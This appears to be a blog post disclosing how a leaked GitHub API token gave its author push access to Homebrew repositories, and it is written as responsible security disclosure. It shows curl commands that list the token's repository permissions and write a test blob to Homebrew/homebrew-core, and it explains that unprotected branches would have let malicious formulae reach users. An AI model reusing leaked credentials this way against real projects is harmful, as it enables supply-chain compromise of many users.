How I gained commit access to Homebrew in 30 minutes

Let’s get leaky

$ curl https://api.github.com/user/repos -u $GITHUB_API_TOKEN:x-oauth-basic | jq '.[] | {repo: .full_name, permissions: .permissions}'
{
"repo": "BrewTestBot/homebrew-core",
"permissions": {
"admin": true,
"push": true,
"pull": true
}
}
{
"repo": "Homebrew/brew",
"permissions": {
"admin": false,
"push": true,
"pull": true
}
}
{
"repo": "Homebrew/formulae.brew.sh",
"permissions": {
"admin": false,
"push": true,
"pull": true
}
}
{
"repo": "Homebrew/homebrew-core",
"permissions": {
"admin": false,
"push": true,
"pull": true
}
}
  • Homebrew/brew
  • Homebrew/homebrew-core
  • Homebrew/formulae.brew.sh
$ curl https://api.github.com/repos/Homebrew/homebrew-core/git/blobs -u $GITHUB_API_TOKEN:x-oauth-basic -d '{"content":"test"}' -H "Content-Type: application/json"
{
"sha": "30d74d258442c7c65512eafab474568dd706c430",
"url": "https://api.github.com/repos/Homebrew/homebrew-core/git/blobs/30d74d258442c7c65512eafab474568dd706c430"
}

What this means

  • Hundreds of thousands of people use Homebrew, including employees at some of the biggest companies in Silicon Valley.
  • The most frequently installed package in the last 30 days is openssl, which was installed over 500k times: https://formulae.brew.sh/analytics/install/30d/
  • I had direct commit access to the Homebrew/homebrew-core repo. At the time, this repo did not have a protected master branch, meaning I would have been able to make a fast-forward change to refs/heads/master. Anyone that freshly installed Homebrew, or ran brew update would have my malicious formulae.

What’s being done

--

--

--

Operations Engineer at Remind

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Best practices of Kubernetes cost optimization on AWS

Cloud Resume Challenge — My Experience

High Level AWS Elastic Load Balancing (ELB) Overview

Spawn a Kubernetes Multi-Node Cluster over AWS with Ansible: Collections

Top 5 Companies using DevOps in 2021

Returning from a Ruby proc: beware of where you land!

Why did I build ePersonate as an opinionated impersonation service?

BASICS OF NUMPY

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Eric Holmes

Eric Holmes

Operations Engineer at Remind

More from Medium

Best Options to Build an Online Food Delivery Platform

How to Automate Your Business Using Odoo.

How to Automate Your Business Using Odoo

Creating Cross-Account AWS Code Pipeline and resources required for Website Deployment hosted on S3…

Best spelling and grammar extensions